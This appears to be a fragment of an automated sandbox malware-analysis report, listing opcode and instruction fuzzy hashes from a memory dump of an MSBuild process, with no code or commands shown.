                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdfb5661ade61f33b994652b4a62dc852a12571f2a6212da6a9ebbf5f3d54d56
                                                                                                                      • Instruction ID: 864f1a66a77f43c1d97a42b676ea606048013707cb9998d42aff903545a08931
                                                                                                                      • Opcode Fuzzy Hash: cdfb5661ade61f33b994652b4a62dc852a12571f2a6212da6a9ebbf5f3d54d56
                                                                                                                      • Instruction Fuzzy Hash: EFF0963170071087D70467B4E96C76A3795A7C1789B048979950AC73D0DEFEEC41C7D5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 498e5f6d49d0e701240b9329585021c3da17c58dc91d5bae06a1bb360d04340b
                                                                                                                      • Instruction ID: 44d5cc6cb4d3964e29409d767db11a138de8fb80c97ca73907693d5e3a142521
                                                                                                                      • Opcode Fuzzy Hash: 498e5f6d49d0e701240b9329585021c3da17c58dc91d5bae06a1bb360d04340b
                                                                                                                      • Instruction Fuzzy Hash: 17F09071A08254DFCB05DBB8D8545EC7FB5EFCA304B0481EAE019D7275E7798A45CB40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6ee9b388fc8694a626dc2d760707c24224ef19ba6878b5fa7d97cd67dc0bbb5b
                                                                                                                      • Instruction ID: d383f1f44c3d71b1a315c4b49a9b37330944d00d042e1214f84d980c2cdadb08
                                                                                                                      • Opcode Fuzzy Hash: 6ee9b388fc8694a626dc2d760707c24224ef19ba6878b5fa7d97cd67dc0bbb5b
                                                                                                                      • Instruction Fuzzy Hash: A1F0E231305204AFC7009B79DC5889ABBBAEFC9221710857BE909CB36ADA788C01C765
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2722d72d9f0aeef03148aba3a48e5b23853cd5dbe05a77e465f6a2cfc21444b2
                                                                                                                      • Instruction ID: 3bf2388d116f0a3a47aeb1404390af787df32055eb22074b184f94c377b9fbce
                                                                                                                      • Opcode Fuzzy Hash: 2722d72d9f0aeef03148aba3a48e5b23853cd5dbe05a77e465f6a2cfc21444b2
                                                                                                                      • Instruction Fuzzy Hash: 91E09B31301204AFC704DB69EC5489ABBEAEFCD351710853AA909C7325DE795C01C765
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 64f4c5cdff0a882156a7c6a7d47cac0805e85ca9305021b9bebd815b98360d74
                                                                                                                      • Instruction ID: b495c63c2a94ec8ebb0e4abd066d9b854e4d66261713f9eeab30d1276863c8b3
                                                                                                                      • Opcode Fuzzy Hash: 64f4c5cdff0a882156a7c6a7d47cac0805e85ca9305021b9bebd815b98360d74
                                                                                                                      • Instruction Fuzzy Hash: A9F0F474640205CFDB14EFB4D258A68BBB2EB89308F2044A8E4069F3B1CB799801CF04
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 655d0d1887844fb6268f9c885cfa10e31859eac08fbd273c3bca957d105e3713
                                                                                                                      • Instruction ID: 1f931146e52de304738e7ec3c53ec6cfe0a0c1780fe52fe6cf84a64ee4255aca
                                                                                                                      • Opcode Fuzzy Hash: 655d0d1887844fb6268f9c885cfa10e31859eac08fbd273c3bca957d105e3713
                                                                                                                      • Instruction Fuzzy Hash: 22E09230A4534CEFCB51DBB4A90159CBFB5DB5620171045AAD80CE7262E6395E058B41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: efee9a727d4ecb751eb84b0a4655a0d79901f796baf2090f74c66258a96812f9
                                                                                                                      • Instruction ID: 618864cd44229e615504328eb7c226403e11ad96e9525453d5d6b5b77fb17871
                                                                                                                      • Opcode Fuzzy Hash: efee9a727d4ecb751eb84b0a4655a0d79901f796baf2090f74c66258a96812f9
                                                                                                                      • Instruction Fuzzy Hash: EEE0C77260E3400FD3A15279AD003913BD88B93360B008EB7F889EB352E159AC0083E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5eda764eb39e2127a51d829e65612c289af1b442d29bd746128923da315af33b
                                                                                                                      • Instruction ID: fabdc234e034c24c7df12a862ea8d3310e37ea4c4bb8f58187b5185df838e5bb
                                                                                                                      • Opcode Fuzzy Hash: 5eda764eb39e2127a51d829e65612c289af1b442d29bd746128923da315af33b
                                                                                                                      • Instruction Fuzzy Hash: 82D01231A00108EF8B40DFB4EA0659DBBF5DB44205B1041A9950CD7210FB715F049B44